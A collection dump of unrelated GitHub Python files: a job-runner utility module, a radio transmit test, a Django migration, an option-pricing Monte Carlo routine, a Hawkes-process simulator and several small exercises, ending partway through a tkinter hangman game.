__str__(self):\n return self._queue.__str__()\n\n __repr__ = __str__\n\n @property\n def length(self):\n return self.qsize()\n\n @property\n def queue(self):\n return sorted(self._queue)\n\n def puts(self, *items, **kw):\n for item in items:\n self.put(item, **kw)\n\n def get(self, name=None, block=True, timeout=None):\n with self.not_empty:\n if not block:\n if not self._qsize():\n raise Empty\n elif timeout is None:\n while not self._qsize():\n self.not_empty.wait()\n elif timeout < 0:\n raise ValueError(\"'timeout' must be a non-negative number\")\n else:\n endtime = now() + timeout\n while not self._qsize():\n remaining = endtime - now()\n if remaining <= 0.0:\n raise Empty\n self.not_empty.wait(remaining)\n item = self._get(name)\n self.not_full.notify()\n return item\n\n\nclass ParseSingal(Thread):\n\n def __init__(self, obj=None):\n super(ParseSingal, self).__init__()\n signal.signal(signal.SIGINT, self.signal_handler)\n signal.signal(signal.SIGTERM, self.signal_handler)\n signal.signal(signal.SIGUSR1, self.signal_handler_us)\n self.daemon = True\n self.obj = obj\n\n def run(self):\n time.sleep(1)\n\n def _exit(self):\n self.obj.safe_exit()\n\n def signal_handler(self, signum, frame):\n self.obj.signaled = True\n self._exit()\n # os._exit(signum) # Force Exit\n sys.exit(signum) # SystemExit Exception\n\n def signal_handler_us(self, signum, frame):\n self.obj.signaled = True\n self._exit()\n raise QsubError(self.obj.err_msg)\n\n\nclass RunThread(Thread):\n\n def __init__(self, func, *args):\n super(RunThread, self).__init__()\n self.args = args\n self.func = func\n self.exitcode = 0\n self.exception = None\n self.exc_traceback = ''\n self.daemon = True\n\n def run(self):\n try:\n self._run()\n except Exception as e:\n self.exitcode = 1\n self.exception = e\n self.exc_traceback = ''.join(\n traceback.format_exception(*sys.exc_info()))\n\n def _run(self):\n try:\n self.func(*(self.args))\n except Exception as e:\n raise e\n\n\nclass DummyFile(object):\n def write(self, x):\n pass\n\n\nclass mute(object):\n\n def __init__(self, func):\n wraps(func)(self)\n\n def __call__(self, *args, **kwargs): # wrapper function\n if sys.version_info >= (3, 5):\n with open(os.devnull, 'w') as devnull:\n with contextlib.redirect_stdout(devnull):\n return self.__wrapped__(*args, **kwargs)\n else:\n sys.stdout = DummyFile()\n try:\n return self.__wrapped__(*args, **kwargs)\n finally:\n sys.stdout = sys.__stdout__\n\n def __get__(self, instance, cls): # wrapper instance method\n if instance is None:\n return self\n return types.MethodType(self, instance)\n\n\nclass MaxRetryError(Exception):\n pass\n\n\ndef retry(func=None, *, max_num=3, delay=5, callback=None):\n if func is None:\n return partial(retry, max_num=max_num, delay=delay, callback=callback)\n elif not callable(func):\n raise TypeError(\"Not a callable. Did you use a non-keyword argument?\")\n log = logging.getLogger()\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n try_num = 0\n while try_num < max_num+1:\n try_num += 1\n try:\n if try_num > 1:\n log.warning(\"retry %s\", try_num-1)\n res = func(*args, **kwargs)\n except Exception as e:\n if try_num > 1:\n log.error(\"retry %s error, %s\", try_num-1, e)\n else:\n log.error(e)\n if try_num <= max_num:\n time.sleep(delay)\n continue\n else:\n break\n else:\n raise MaxRetryError(\"max retry %s error\" % max_num)\n if callback:\n return callback(res)\n return res\n return wrapper\n\n\ndef getlog(logfile=None, level=\"info\", name=None):\n logger = logging.getLogger(name)\n if level.lower() == \"info\":\n logger.setLevel(logging.INFO)\n elif level.lower() == \"debug\":\n logger.setLevel(logging.DEBUG)\n if logfile is None:\n if logger.hasHandlers():\n return logger\n h = logging.StreamHandler(sys.stdout)\n else:\n h = logging.FileHandler(logfile, mode='w')\n h.setFormatter(Formatter())\n logger.addHandler(h)\n return logger\n\n\ndef style(string, mode='', fore='', back=''):\n STYLE = {\n 'fore': Formatter.f_color_map,\n 'back': Formatter.b_color_map,\n 'mode': Formatter.mode_map,\n 'default': {'end': 0},\n }\n mode = '%s' % STYLE[\"mode\"].get(mode, \"\")\n fore = '%s' % STYLE['fore'].get(fore, \"\")\n back = '%s' % STYLE['back'].get(back, \"\")\n style = ';'.join([s for s in [mode, fore, back] if s])\n style = '\\033[%sm' % style if style else ''\n end = '\\033[%sm' % STYLE['default']['end'] if style else ''\n return '%s%s%s' % (style, string, end)\n\n\nREQUIRED = style(\"(required)\", fore=\"green\", mode=\"bold\")\n\n\ndef get_job_state(state):\n s = state.lower() if state else state\n if s == 'running':\n return style(state, fore=\"cyan\")\n if s == 'finished':\n return style(state, fore=\"green\")\n elif s == 'waiting':\n return style(state, fore=\"white\")\n elif s == 'failed':\n return style(state, fore=\"red\")\n elif s == 'stopped':\n return style(state, fore=\"yellow\")\n else:\n return style(state, fore=\"white\")\n\n\ndef now():\n if hasattr(time, 'monotonic'):\n return time.monotonic()\n return time.time()\n\n\ndef seconds2human(s):\n m, s = divmod(s, 60)\n h, m = divmod(int(m), 60)\n return \"{:d}:{:02d}:{:04.2f}\".format(h, m, s)\n\n\ndef mkdir(*path):\n for p in path:\n if not isdir(p):\n try:\n os.makedirs(p)\n except:\n pass\n\n\ndef is_entry_cmd():\n prog = abspath(realpath(sys.argv[0]))\n return basename(prog) in \\\n list(pkg_resources.get_entry_map(__package__).values())[0].keys() \\\n and join(sys.prefix, \"bin\", basename(prog)) == prog\n\n\ndef terminate_process(pid):\n try:\n pproc = psutil.Process(pid)\n for cproc in pproc.children(recursive=True):\n # cproc.terminate() # SIGTERM\n cproc.kill() # SIGKILL\n # pproc.terminate()\n pproc.kill()\n except:\n pass\n\n\ndef call_cmd(cmd, verbose=False):\n shell = True\n if isinstance(cmd, list):\n shell = False\n if verbose:\n print(cmd)\n call(cmd, shell=shell, stdout=PIPE, stderr=PIPE)\n else:\n with open(os.devnull, \"w\") as fo:\n call(cmd, shell=shell, stdout=fo, stderr=fo)\n\n\ndef show_help_on_empty_command():\n if len(sys.argv) == 1:\n sys.argv.append('--help')\n\n\ndef is_sge_submit():\n if os.getenv(\"SGE_ROOT\") and which(\"qconf\"):\n hostname = splitext(socket.gethostname())[0]\n try:\n with os.popen(\"qconf -ss\") as fi:\n for line in fi:\n if line.strip() == hostname or splitext(line.strip())[0] == hostname:\n return True\n except:\n return False\n return False\n\n\ndef common_parser():\n p = argparse.ArgumentParser(add_help=False)\n common = p.add_argument_group(\"common arguments\")\n common.add_argument('-v', '--version',\n action='version', version=\"v\" + __version__)\n common.add_argument(\"-j\", \"--jobfile\", type=argparse.FileType('r'), nargs=\"?\", default=sys.stdin,\n help=\"input jobfile, if empty, stdin is used. \" + REQUIRED, metavar=\"\")\n common.add_argument(\"-n\", \"--num\", type=int,\n help=\"the max job number runing at the same time. (default: all of the jobfile, max 1000)\", metavar=\"\")\n common.add_argument(\"-s\", \"--startline\", type=int,\n help=\"which line number(1-base) be used for the first job. (default: %(default)s)\", metavar=\"\", default=1)\n common.add_argument(\"-e\", \"--endline\", type=int,\n help=\"which line number (include) be used for the last job. (default: last line of the jobfile)\", metavar=\"\")\n common.add_argument('-d', '--debug', action='store_true',\n help='log debug info.', default=False)\n common.add_argument(\"-l\", \"--log\", type=str,\n help='append log info to file. (default: stdout)', metavar=\"\")\n common.add_argument('-r', '--retry', help=\"retry N times of the error job, 0 or minus means do not re-submit. (default: %(default)s)\",\n type=int, default=0, metavar=\"\")\n common.add_argument('-ivs', '--retry-ivs', help=\"retry the error job after N seconds. (default: %(default)s)\",\n type=int, default=2, metavar=\"\")\n common.add_argument(\"-f\", \"--force\", default=False, action=\"store_true\",\n help=\"force to submit jobs even if already successed.\")\n common.add_argument(\"--dot\", action=\"store_true\", default=False,\n help=\"do not execute anything and print the directed acyclic graph of jobs in the dot language.\")\n common.add_argument(\"--local\", default=False, action=\"store_true\",\n help=\"submit your jobs in localhost, same as '--mode local'.\")\n common.add_argument(\"--strict\", action=\"store_true\", default=False,\n help=\"use strict to run, means if any errors, clean all jobs and exit.\")\n common.add_argument(\"--quiet\", action=\"store_true\", default=False,\n help=\"suppress all output and logging\")\n common.add_argument('--max-check', help=\"maximal number of job status checks per second, fractions allowed. (default: %(default)s)\",\n type=float, default=3, metavar=\"\")\n common.add_argument('--max-submit', help=\"maximal number of jobs submited per second, fractions allowed. (default: %(default)s)\",\n type=float, default=30, metavar=\"\")\n return p\n\n\ndef runsgeArgparser():\n parser = argparse.ArgumentParser(\n description=\"%(prog)s is a tool for managing parallel tasks from a specific shell scripts runing in localhost, sge or batchcompute.\",\n parents=[common_parser()],\n formatter_class=CustomHelpFormatter,\n allow_abbrev=False)\n parser.add_argument(\"-wd\", \"--workdir\", type=str, help=\"work dir. (default: %(default)s)\",\n default=abspath(os.getcwd()), metavar=\"\")\n parser.add_argument(\"-N\", \"--jobname\", type=str,\n help=\"job name. (default: basename of the jobfile)\", metavar=\"\")\n parser.add_argument(\"-lg\", \"--logdir\", type=str,\n help='the output log dir. (default: \"%s/%s_*_log_dir\")' % (os.getcwd(), \"%(prog)s\"), metavar=\"\")\n parser.add_argument(\"-g\", \"--groups\", type=int, default=1,\n help=\"N lines to consume a new job group. (default: %(default)s)\", metavar=\"\")\n parser.add_argument('--init', help=\"command before all jobs, will be running in localhost.\",\n type=str, metavar=\"\")\n parser.add_argument('--call-back', help=\"command after all jobs finished, will be running in localhost.\",\n type=str, metavar=\"\")\n parser.add_argument('--mode', type=str, default=\"sge\", choices=[\n \"sge\", \"local\", \"localhost\", \"batchcompute\"], help=\"the mode to submit your jobs, if no sge installed, always localhost. (default: %(default)s)\")\n parser.add_argument('-ini', '--ini',\n help=\"input configfile for configurations search.\", metavar=\"\")\n parser.add_argument(\"-config\", '--config', action='store_true',\n help=\"show configurations and exit.\", default=False)\n sge = parser.add_argument_group(\"sge arguments\")\n sge.add_argument(\"-q\", \"--queue\", type=str, help=\"the queue your job running, multi queue can be sepreated by whitespace. (default: all accessed queue)\",\n nargs=\"*\", metavar=\"\")\n sge.add_argument(\"-m\", \"--memory\", type=int,\n help=\"the memory used per command (GB). (default: %(default)s)\", default=1, metavar=\"\")\n sge.add_argument(\"-c\", \"--cpu\", type=int,\n help=\"the cpu numbers you job used. (default: %(default)s)\", default=1, metavar=\"\")\n batchcmp = parser.add_argument_group(\"batchcompute arguments\")\n batchcmp.add_argument(\"-om\", \"--out-maping\", type=str,\n help='the oss output directory if your mode is \"batchcompute\", all output file will be mapping to you OSS://BUCKET-NAME. if not set, any output will be reserved.', metavar=\"\")\n batchcmp.add_argument('--access-key-id', type=str,\n help=\"AccessKeyID while access oss.\", metavar=\"\")\n batchcmp.add_argument('--access-key-secret', type=str,\n help=\"AccessKeySecret while access oss.\", metavar=\"\")\n batchcmp.add_argument('--region', type=str, default=\"beijing\", choices=['beijing', 'hangzhou', 'huhehaote', 'shanghai',\n 'zhangjiakou', 'chengdu', 'hongkong', 'qingdao', 'shenzhen'], help=\"batch compute region. (default: %(default)s)\")\n parser.description = style(\n parser.description, fore=\"red\", mode=\"underline\")\n return parser\n\n\ndef runjobArgparser():\n parser = argparse.ArgumentParser(\n description=\"%(prog)s is a tool for managing parallel tasks from a specific job file running in localhost or sge cluster.\",\n parents=[common_parser()],\n formatter_class=CustomHelpFormatter,\n allow_abbrev=False)\n parser.add_argument('-i', '--injname', help=\"job names you need to run. (default: all job names of the jobfile)\",\n nargs=\"*\", type=str, metavar=\"\")\n parser.add_argument(\"-m\", '--mode', type=str, default=\"sge\", choices=[\n \"sge\", \"local\", \"localhost\"], help=\"the mode to submit your jobs, if no sge installed, always localhost. (default: %(default)s)\")\n parser.description = style(\n parser.description, fore=\"red\", mode=\"underline\")\n return parser\n\n\ndef shellJobArgparser(arglist):\n parser = argparse.ArgumentParser(add_help=False)\n parser.add_argument(\"-q\", \"--queue\", type=str, nargs=\"*\")\n parser.add_argument(\"-m\", \"--memory\", type=int)\n parser.add_argument(\"-c\", \"--cpu\", type=int)\n parser.add_argument(\"-g\", \"--groups\", type=int)\n parser.add_argument(\"-n\", \"--jobname\", type=str)\n parser.add_argument(\"-om\", \"--out-maping\", type=str)\n parser.add_argument(\"-wd\", \"--workdir\", type=str)\n parser.add_argument('--mode', type=str)\n parser.add_argument(\"--local\", default=False, action=\"store_true\")\n return parser.parse_known_args(arglist)[0]\n\n\nclass AppDirs(object):\n \"\"\"Convenience wrapper for getting application dirs.\"\"\"\n\n def __init__(self, appname=None, version=None):\n self.appname = appname\n self.version = version\n\n @property\n def user_data_dir(self):\n path = os.getenv('XDG_DATA_HOME', os.path.expanduser(\"~/.local/share\"))\n return self.__user_dir(path)\n\n @property\n def site_data_dir(self):\n path = os.getenv('XDG_DATA_DIRS',\n os.pathsep.join(['/usr/local/share', '/usr/share']))\n return self.__site_dir(path)\n\n @property\n def site_config_dir(self):\n path = os.getenv('XDG_CONFIG_DIRS', '/etc/xdg')\n return self.__site_dir(path)\n\n @property\n def user_config_dir(self):\n path = os.getenv('XDG_CONFIG_HOME', os.path.expanduser(\"~/.config\"))\n return self.__user_dir(path)\n\n @property\n def user_cache_dir(self):\n path = os.getenv('XDG_CACHE_HOME', os.path.expanduser('~/.cache'))\n return self.__user_dir(path)\n\n @property\n def user_state_dir(self):\n path = os.getenv('XDG_STATE_HOME',\n os.path.expanduser(\"~/.local/state\"))\n return self.__user_dir(path)\n\n @property\n def user_log_dir(self):\n return os.path.join(self.user_cache_dir, \"log\")\n\n def __user_dir(self, path):\n if self.appname:\n path = os.path.join(path, self.appname)\n if self.appname and self.version:\n path = os.path.join(path, self.version)\n return path\n\n def __site_dir(self, path, multipath=False):\n pathlist = [os.path.expanduser(x.rstrip(os.sep))\n for x in path.split(os.pathsep)]\n appname = self.appname\n version = self.version\n if appname:\n if version:\n appname = os.path.join(appname, version)\n pathlist = [os.sep.join([x, appname]) for x in pathlist]\n if multipath:\n path = os.pathsep.join(pathlist)\n else:\n path = pathlist[0]\n return path\n\n\ndef user_config_dir(app=__package__, version=\"\"):\n app = AppDirs(app, version)\n return app.user_config_dir\n\n\nclass CustomHelpFormatter(argparse.HelpFormatter):\n\n def _get_help_string(self, action):\n \"\"\"Place default and required value in help string.\"\"\"\n h = action.help\n\n # Remove any formatting used for Sphinx argparse hints.\n h = h.replace('``', '')\n\n if '%(default)' not in action.help:\n if action.default != '' and action.default != [] and \\\n action.default is not None and \\\n not isinstance(action.default, bool) and \\\n not isinstance(action.default, io.IOBase):\n if action.default is not argparse.SUPPRESS:\n defaulting_nargs = [\n argparse.OPTIONAL, argparse.ZERO_OR_MORE]\n\n if action.option_strings or action.nargs in defaulting_nargs:\n if '\\n' in h:\n lines = h.splitlines()\n lines[0] += ' (default: %(default)s)'\n h = '\\n'.join(lines)\n else:\n h += ' (default: %(default)s)'\n if \"required\" not in action.help and hasattr(action, \"required\") and action.required:\n h += \" \" + REQUIRED\n return h\n\n def _format_action_invocation(self, action):\n \"\"\"Removes duplicate ALLCAPS with positional arguments.\"\"\"\n if not action.option_strings:\n default = self._get_default_metavar_for_positional(action)\n metavar, = self._metavar_formatter(action, default)(1)\n return metavar\n\n else:\n parts = []\n\n # if the Optional doesn't take a value, format is:\n # -s, --long\n if action.nargs == 0:\n parts.extend(action.option_strings)\n\n # if the Optional takes a value, format is:\n # -s ARGS, --long ARGS\n else:\n default = self._get_default_metavar_for_optional(action)\n args_string = self._format_args(action, default)\n for option_string in action.option_strings:\n parts.append(option_string)\n\n return '%s %s' % (', '.join(parts), args_string)\n\n return ', '.join(parts)\n\n def _get_default_metavar_for_optional(self, action):\n return action.dest.upper()\n\n def _get_default_metavar_for_positional(self, action):\n return action.dest\n\n\nclass RateLimiter(object):\n \"\"\"Provides rate limiting for an operation with a configurable number of\n requests for a time period.\n \"\"\"\n\n def __init__(self, max_calls, period=1.0, callback=None):\n \"\"\"Initialize a RateLimiter object which enforces as much as max_calls\n operations on period (eventually floating) number of seconds.\n \"\"\"\n if period <= 0:\n raise ValueError('Rate limiting period should be > 0')\n if max_calls <= 0:\n raise ValueError('Rate limiting number of calls should be > 0')\n\n # We're using a deque to store the last execution timestamps, not for\n # its maxlen attribute, but to allow constant time front removal.\n self.calls = deque()\n\n self.period = period\n self.max_calls = max_calls\n self.callback = callback\n self._lock = Lock()\n\n # Lock to protect creation of self._alock\n self._init_lock = Lock()\n\n def __call__(self, f):\n \"\"\"The __call__ function allows the RateLimiter object to be used as a\n regular function decorator.\n \"\"\"\n @wraps(f)\n def wrapped(*args, **kwargs):\n with self:\n return f(*args, **kwargs)\n return wrapped\n\n def __enter__(self):\n with self._lock:\n # We want to ensure that no more than max_calls were run in the allowed\n # period. For this, we store the last timestamps of each call and run\n # the rate verification upon each __enter__ call.\n if len(self.calls) >= self.max_calls:\n until = time.time() + self.period - self._timespan\n if self.callback:\n t = Thread(target=self.callback, args=(until,))\n t.daemon = True\n t.start()\n sleeptime = until - time.time()\n if sleeptime > 0:\n time.sleep(sleeptime)\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n with self._lock:\n # Store the last operation timestamp.\n self.calls.append(time.time())\n\n # Pop the timestamp list front (ie: the older calls) until the sum goes\n # back below the period. This is our 'sliding period' window.\n while self._timespan >= self.period:\n self.calls.popleft()\n\n @property\n def _timespan(self):\n return self.calls[-1] - self.calls[0]\n","repo_name":"yodeng/runjob","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":24497,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"22941094026","text":"import time\nimport FSK_test\nimport busio\nfrom digitalio import DigitalInOut, Direction, Pull\nimport board\n\n\nCS = DigitalInOut(board.CE1)\nRESET = DigitalInOut(board.D25)\nspi = busio.SPI(board.SCK,MOSI=board.MOSI, MISO=board.MISO)\n\nrfm9x = FSK_test.RFM9x(spi, CS, RESET, 915.0)\n\nrfm9x.tx_power = 23\n\ncurrent_temp = rfm9x.temperature_value()\n\nrfm9x.configure_temperature_threshold(5)\n\nrfm9x.gaussian_filter_calibration(10)\n\nprint(\"gaussian filter is \",rfm9x.current_gaussian_filter_used(), \"BT\")\n\ndata=bytes(\"please work\",\"utf-8\")\n\nprint(\"How many packets do you want sent?:\")\nnum_of_packets = input()\n\nprint(\"what gaussian filter setting?:\")\n\ngauss_fil = input()\n\nrfm9x.gaussian_filter_calibration(gauss_fil)\n\nprint(\"temp threshold?:\")\n\nthresh = input()\n\nrfm9x.configure_temperature_threshold(thresh)\n\nprint(\"what is the desired bitrate?\")\n\nbitrate_select = input()\n\nrfm9x.bitrate = float(bitrate_select)\n\n\n\nwhile True:\n \n rfm9x.send(data)\n \n print(\"data sent\")\n \n print(rfm9x.temp_threshold)\n \n print(current_temp)\n \n time.sleep(2)\n \n print(data)\n \n num_of_packets = int(num_of_packets) - 1\n \n if num_of_packets == 0:\n \n print(\"transmission over\")\n \n break\n \n \n\n","repo_name":"adamhuu/adam-and-christi-raspi-code-whoop-whoop","sub_path":"Main_fsk_test.py","file_name":"Main_fsk_test.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21958886166","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('characters', '0012_magenpc_is_npc'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='magenpc',\n name='is_npc',\n ),\n ]\n","repo_name":"wlansu/wod","sub_path":"wod/characters/migrations/0013_remove_magenpc_is_npc.py","file_name":"0013_remove_magenpc_is_npc.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36240916711","text":"from ..monte_carlo import monteCarloSkeleton, monteCarloStats\nfrom ...black_scholes.greeks import callDelta, putDelta\n\nimport numpy as np\n\n\ndef deltaCVBlackScholes(current: float, volatility: float, ttm: float,\n strike: float, rf: float, dividend: float, sim_count: int, eval_count: int, beta1: float, opt_type: str='C') -> dict:\n \"\"\"Function to model the price of a European Option, under the\n Black-Scholes pricing model heuristic, using a control variates method\n variance-reduced Monte-Carlo simulation.\n\n This function simulates a delta-hedged portfolio mimicking a call or put\n option, under the Black-Scholes pricing heuristic.\n\n Then, Monte Carlo simulation statistics are computed for each of the\n simulations, and a dict of results is returned.\n \n Arguments:\n current {float} -- Current price of the underlying asset.\n volatility {float} -- Volatility of the underlying asset price.\n ttm {float} -- Time to expiration (in years).\n strike {float} -- Strike price of the option contract.\n rf {float} -- Risk-free rate (annual).\n dividend {float} -- Dividend yield (annual).\n sim_count {int} -- Number of paths to simulate.\n eval_count {int} -- Number of evaluations per path simulation.\n beta {float} -- Beta coefficient for the delta hedge.\n \n Keyword Arguments:\n opt_type {str} -- Option type; must be 'C' or 'P' (default: {'C'}).\n \n Raises:\n ValueError: Raised if `opt_type` is not 'C' or 'P'.\n \n Returns:\n dict -- Formatted dictionary of Monte Carlo simulation results.\n \"\"\"\n\n # Verify option type choice\n if opt_type not in ['C', 'P']:\n raise ValueError('Incorrect option type; must be \"C\" or \"P\".')\n \n # Computing delta t\n dt = ttm / eval_count\n # Computing nudt\n nudt = (rf - dividend - (np.power(volatility, 2) / 2)) * dt\n # Delta bias correction\n erddt = np.exp((rf - dividend) * dt)\n\n # Building vector of ttms (for option delta evaluation)\n # Note: This starts from timestep 1, to timestep eval_count.\n # Note: This is the time to maturity, the order must be flipped to match\n # the simulated asset prices (at the first sim price\n # it is ((ttm - dt), (ttm - 2*dt), ...)\n ttm_vec = np.flip(np.arange(start=dt, stop=(ttm + dt), step=dt))\n\n # Defining lambda function to model underlying Geometric Brownian Motion,\n # and Delta-based control variate\n gbm = lambda x: nudt + (volatility * np.sqrt(dt) * x)\n\n # Defining simulation function\n def sim_func(x: np.array) -> float:\n # Underlying price path\n st = np.cumprod(np.exp(gbm(x))) * current\n\n if (opt_type == 'C'):\n # Call option\n # Delta computation\n delta = callDelta(current=st,\n volatility=volatility,\n ttm=ttm_vec,\n strike=strike,\n rf=rf,\n dividend=dividend)\n\n # Terminal payoff computation (future value)\n terminal_payoff = np.maximum(st[-1] - strike, 0)\n else:\n # Put option\n # Delta computation\n delta = putDelta(current=st,\n volatility=volatility,\n ttm=ttm_vec,\n strike=strike,\n rf=rf,\n dividend=dividend)\n # Terminal payoff computation (future value)\n terminal_payoff = np.maximum(strike - st[-1], 0)\n\n # Control variate computation\n cv = np.sum(delta[:-1] * (st[1:] - (st[:-1] * erddt)))\n\n # Adjusting estimate by control variate; returning present value\n return np.exp(-1 * rf * ttm) * (terminal_payoff + (cv * beta1))\n\n # Runnig simulation\n mc_output = monteCarloSkeleton(sim_count=sim_count,\n eval_count=eval_count,\n sim_func=sim_func)\n\n # Computing and returning sample statistics\n return monteCarloStats(mc_output=mc_output)\n","repo_name":"rukmal/fe621","sub_path":"fe621/monte_carlo/option_pricing/control_variates.py","file_name":"control_variates.py","file_ext":"py","file_size_in_byte":4173,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"72"} +{"seq_id":"26451401458","text":"import numpy as np\nimport scipy.stats\n\n\n# 使用指数核计算时间衰减的影响\ndef kernel(current_time, history_time, omega):\n return omega * np.exp(-omega * (current_time - history_time))\n\n\n# 从参数为namuta的指数分布中进行采样\ndef samplefromExponential(namuta):\n C = scipy.stats.expon(scale=namuta)\n rv = C.rvs()\n return rv\n\n\n# 计算t时刻第i维的强度\ndef cal_natmuta_i_sum(mu, alpha, omega, history, ajacencymatrix, t, i):\n namutai = mu[i]\n '''his=(retweeter,tweeter,time)'''\n for his in history:\n if ajacencymatrix[i][his[0]] == 1:\n namutai += alpha[his[0]][i] * kernel(t, his[2], omega)\n return namutai\n\n\n# 计算t时刻所有维度强度之和\ndef cal_namutastarsum(mu, alpha, omega, history, ajacencymatrix, t):\n dim = mu.shape[0]\n sum = 0.0\n for i in range(dim):\n sum += cal_natmuta_i_sum(mu, alpha, omega, history, ajacencymatrix, t, i)\n return sum\n\n\n# 基于霍克斯过程的预测\ndef multidimensional_sim(mu, alpha, omega, T, ajacencymatrix, numEvents):\n history = []\n hiswithouttime = []\n dim = mu.shape[0]\n t = 0.0\n # 由于数据中节点总数只有100个,这里选择pagerank值最高的节点作为初始节点\n n0 = 65\n namutahat = 0.0\n namutastarsum = 0.0\n history.append((n0, n0, t))\n count = 1\n quit=False\n while count <= numEvents:\n '''begin sample nextevent'''\n namutastarsum = cal_namutastarsum(mu, alpha, omega, history, ajacencymatrix, t)\n namutahat = namutastarsum\n # s:从namutahat的指数分布中采样得到:\n s = samplefromExponential(namutahat)\n t += s\n if t >= T:\n break\n '''start rejection test'''\n namutapingjun = cal_namutastarsum(mu, alpha, omega, history, ajacencymatrix, t) # 这里的t是t‘\n d = np.random.uniform(0, 1, 1)\n if d * namutahat > namutapingjun:\n continue\n '''start attribution test'''\n d = np.random.uniform(0, 1, 1)\n capital_S = 0.0\n for i in range(dim):\n quit=False\n capital_S += cal_natmuta_i_sum(mu, alpha, omega, history, ajacencymatrix, t, i)\n if capital_S >= d:\n for j in range(len(history) - 1, -1, -1):\n retw = [(x[0]) for x in history]\n if (ajacencymatrix[i][history[j][0]] == 1) and i not in retw: # 转发过一次就不能在转发第二次了\n history.append((i, history[j][0], t))\n count += 1\n quit=True\n break\n if quit:\n break\n\n his = []\n #print(count)\n\n for i in range(len(history)):\n his.append((history[i][0], history[i][1], i))\n\n return his","repo_name":"WeiMin-Li-visual/infdiffusion","sub_path":"algorithm/hawkesProcess.py","file_name":"hawkesProcess.py","file_ext":"py","file_size_in_byte":2800,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"15534122360","text":"types_of_people = 10 # define the variable\nx = f\"There are {types_of_people} types of people.\" # print that how many types of people are there, with the use of print(f\"\"\")\n\nbinary = \"binary\" # define the variable\ndo_not = \"don't\" # define the variable\ny = f\"Those who know {binary} and those who {do_not}.\" # define the variable\n\nprint(x)\nprint(y)\n\nprint(f\"I said: {x}\")\nprint(f\"I also said: '{y}\")\n\nhilarious = \"False\"\njoke_evaluation = \"Isn't that joke so funny?! {}\"\nprint(joke_evaluation.format(hilarious))\n\nw = \"This is the left side of...\"\ne = \"a string wirh a right side\"\n\nprint(w + e)","repo_name":"ZhangChen-Tony/Learn-Python3-the-HARD-WAY","sub_path":"6字符串和文本/巩固练习/re1.py","file_name":"re1.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5090697698","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue May 7 17:12:07 2019\n\n@author: HIMANSHU SINGH\n\"\"\"\n\n# Printing Checkerboard Pattern\n\nnum = 1 \nwhile num < 8:\n if num%2 == 0:\n print(\" *\"*8)\n else:\n print(\"* \"*8)\n num += 1","repo_name":"himanshu-singh14/FSDP2019","sub_path":"Day 1, 07-May-19/Programs/checker.py","file_name":"checker.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"32101905171","text":"'''\nWenbo Pan\nCS 5001, Fall 2021\n\nThis program is for the final project checker.\n\nI referenced this Youtube channel https://www.youtube.com/watch?v=vnd3RfeG3NM\nfrom its tutorial on the design of classes and get avaliable moves\n'''\n\nNUM_SQUARES = 8 # The number of squares on each row.\nSQUARE = 50 # The size of each square in the checkerboard.\nSQUARE_COLORS = (\"light gray\", \"white\")\nVALID_SQUARE = \"red\"\nBOARD_COLOR = \"black\"\nPIECES_COLOR = (\"dark red\", \"black\")\nCUSHION = PADDING = 1\nKING_RADIUS = 20\n\n\nCIRCLE_RADIUS = (SQUARE / 2) - 1\nCIRCLE_POSITION = 0.5\nBLACK_ROW = (0, 1, 2)\nRED_ROW = (5, 6, 7)\n\nRED = \"Red\"\nBLACK = \"Black\"\n\nINITIAL_PIECES = 12\n\nRED_DIRECTION = -1\nBLK_DIRECTION = 1\n\nFST_ROW = FST_COL = 0\nLST_ROW = LST_COL = 7\n","repo_name":"wp161/Checkers","sub_path":"constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35646111891","text":"if __name__ == '__main__':\n file_lines = open(\"input.txt\", \"r\").read().splitlines()\n arr_len = len(file_lines[0])\n total_sum = [0] * arr_len\n gamma = [0] * arr_len\n epsilon = [0] * arr_len\n\n for line in file_lines:\n for i in range(0, arr_len):\n total_sum[i] = total_sum[i] + int(line[i])\n\n for i in range(0, arr_len):\n gamma[i] = 1 if total_sum[i] > len(file_lines)/2 else 0\n epsilon[i] = 0 if total_sum[i] > len(file_lines)/2 else 1\n\n gamma_str = ''.join(str(e) for e in gamma)\n epsilon_str = ''.join(str(e) for e in epsilon)\n\n print(int(gamma_str, 2) * int(epsilon_str, 2))\n","repo_name":"martin98m/advent-of-code","sub_path":"day03/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43654257936","text":"from tkinter import *\nfrom Pendu import dessinPendu\nfrom fonction_logique_pendu import *\n\nmot = ChoixDuMot()\nCOULEUR_DE_FOND = \"#23272A\"\nHAUTEUR_DE_CANVAS = 350 # Variables\nLARGEUR_DE_CANVAS = 450\n\n\nroot = Tk() # Création de la fenêtre\n\nroot.title(\"Pendu\")\nroot.geometry(\"1920x1080\") # Configuration de la fenêtre\nroot.minsize(480, 360)\nroot.config(background=COULEUR_DE_FOND)\n\nboiteGraphique = Frame(root, bg=COULEUR_DE_FOND) # Création de la boîte qui contiendra le dessin et le mot\n\ngraphique = Canvas(boiteGraphique, bg=COULEUR_DE_FOND, height=HAUTEUR_DE_CANVAS, 